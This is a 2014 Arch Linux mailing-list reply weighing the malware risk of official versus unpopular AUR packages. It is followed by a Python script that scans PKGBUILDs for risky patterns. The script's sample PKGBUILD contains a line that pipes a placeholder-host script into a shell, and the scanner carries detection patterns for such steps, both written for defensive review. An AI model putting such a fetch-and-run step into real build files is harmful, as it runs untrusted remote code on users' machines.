Alexander, I'll post a link to your response wherever I can. Awesome explanation. Cheers, Eu.

On 06/08/2014 15:44, "Alexander Rødseth" <rodseth@gmail.com> wrote:
Hi,
When people install popular packages from AUR, I think the chances are low that there is anything malicious there, because of the number of people that will have read the PKGBUILD.
Of course, if upstream includes something malicious deep into the source in a tarball, it could be somewhat harder to discover, but I think this is unlikely. If someone would want to do this, they would first have to either create a package with malicious components and then try to make it popular (which is hard) or try to sneak in a patch for an existing project, which is also hard. The number of obstacles and number of eyes to pass by is relatively high (should be high enough for someone to notice), and the malicious people would have to be patient. I may be filled with prejudice towards malicious people, but I believe them to be less patient than the average non-malicious person.
I also think the official packages are safe. The number of steps a malicious person would have to go through is high, and there is much checking of what TUs/devs do from both other TUs/devs and the public.
Extreme patience and sneakiness would have to be employed for someone to even be a little bit malicious with the most popular AUR packages or the official packages. And even then, there are the filesystem permissions, and other security measures in Linux, to overcome if a malicious person is to do anything worthwhile (to the degree that maliciousness could be worthwhile). People may even have installed more fine-grained security with something like SELinux, which would render the endeavor even harder to accomplish.
The unpopular AUR packages are a completely different story. There would be few eyes on both the upstream code and the PKGBUILDs and it would be extremely easy to try to do something malicious. However, just one dedicated Arch Linux user should be enough to check if it did anything malicious, at least for types of maliciousness that are easy to notice for the user, like deleting files or filling the hard drive with pictures of ponies.
Of course, if the upstream sources were from a respected company or organization, it would be easy to read the PKGBUILD and unlikely that the sources contained anything malicious.
Back to the question: I don't know and haven't heard of any cases of actual malice in any Arch Linux packages, neither official ones, nor unofficial ones in AUR.
The worst case I encountered was an AUR package made by someone clueless that cluttered all sorts of directories with misplaced files at install time. This probably does not qualify as malicious, and the package was swiftly removed from AUR.
When it comes to the safety of code, it can be really hard to tell if it is malicious or safe just by reading it. There is a competition called "The Underhanded C Contest" where people contend in hiding code in code: http://underhanded.xcott.com/. And that's only for the packages where the source is open! Who knows what upstream projects with only binary files available might do.
The official Skype package has no available sources, only binary files. According to a recent article by Ars Technica, Skype is vital to NSA surveillance:
http://arstechnica.com/security/2014/05/encrypted-or-not-skype-communication... . The likelihood that Skype is malicious in other ways than this is probably low, but how can we know for sure? Even with the source code, it would take quite a bit of time and effort to be 100% sure (ref. the Underhanded C Contest).
If malicious and unpopular AUR packages would ever become a problem, we could have some sort of required vetting (of the users and/or packages in question) before the packages were made public. I really hope it doesn't come to that. It would just be more work for everybody involved, with little gains for the potentially malicious people.
One would think that the computers that the serious, malicious, sneaky and patient people would target, would rather be the faster and more well connected computers in the world, which are hopefully run by people that care about security and won't install random packages from AUR on their servers.
For now, I think the official packages and popular AUR packages are safe, but be careful with the unpopular AUR packages.
--
Cheers,
Alexander Rødseth / xyproto
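The "read the PKGBUILD before building" step the thread recommends for unpopular AUR packages, as an added example that is not part of the thread and not an Arch Linux tool: a static triage script that flags the things a reviewer usually looks at first (unauthenticated download URLs, skipped checksums, remote scripts piped to a shell, sudo in the build) without ever sourcing the PKGBUILD. The sample PKGBUILD, its package name, URLs and checksum are constructed.

```python
"""Static triage of a PKGBUILD before building an unpopular AUR package.
Added example for the review step discussed in the thread, not an Arch tool;
it never sources the PKGBUILD (that would execute it), it only pattern-matches."""
import re

# Constructed sample PKGBUILD: package name, URLs and checksum are made up.
SAMPLE_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("http://example.invalid/${pkgname}-${pkgver}.tar.gz"
        "fix-build.patch")
sha256sums=('SKIP'
            '0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  curl -s http://example.invalid/setup.sh | sh
  make
}
"""

def _bash_array(name, text):
    """Items of a bash array literal  name=('a' "b" ...)  read as plain strings."""
    m = re.search(rf'^{name}=\((.*?)\)', text, re.S | re.M)
    return re.findall(r'''["']([^"']*)["']''', m.group(1)) if m else []

def triage_pkgbuild(text):
    """Return human-readable findings; an empty list means nothing stood out."""
    findings = []
    sources = _bash_array('source', text)
    for src in sources:
        if re.match(r'(http|ftp|git)://', src):
            findings.append(f'unauthenticated transport: {src}')
    for arr in ('md5sums', 'sha1sums', 'sha256sums', 'sha512sums', 'b2sums'):
        for i, chk in enumerate(_bash_array(arr, text)):
            # SKIP is normal for VCS sources, suspicious for downloaded archives
            if chk == 'SKIP' and i < len(sources) and not sources[i].startswith('git+'):
                findings.append(f'integrity check skipped for: {sources[i]}')
    for m in re.finditer(r'(curl|wget)[^\n|]*\|\s*(ba)?sh\b', text):
        findings.append(f'remote script piped to a shell: {m.group(0).strip()}')
    for m in re.finditer(r'^\s*sudo\s.*$', text, re.M):
        findings.append(f'privilege escalation in build: {m.group(0).strip()}')
    return findings

if __name__ == '__main__':
    for line in triage_pkgbuild(SAMPLE_PKGBUILD) or ['no findings']:
        print(line)
```

An empty result is not a clean bill of health; it only means the cheap checks passed and the build() and package() bodies still deserve a read.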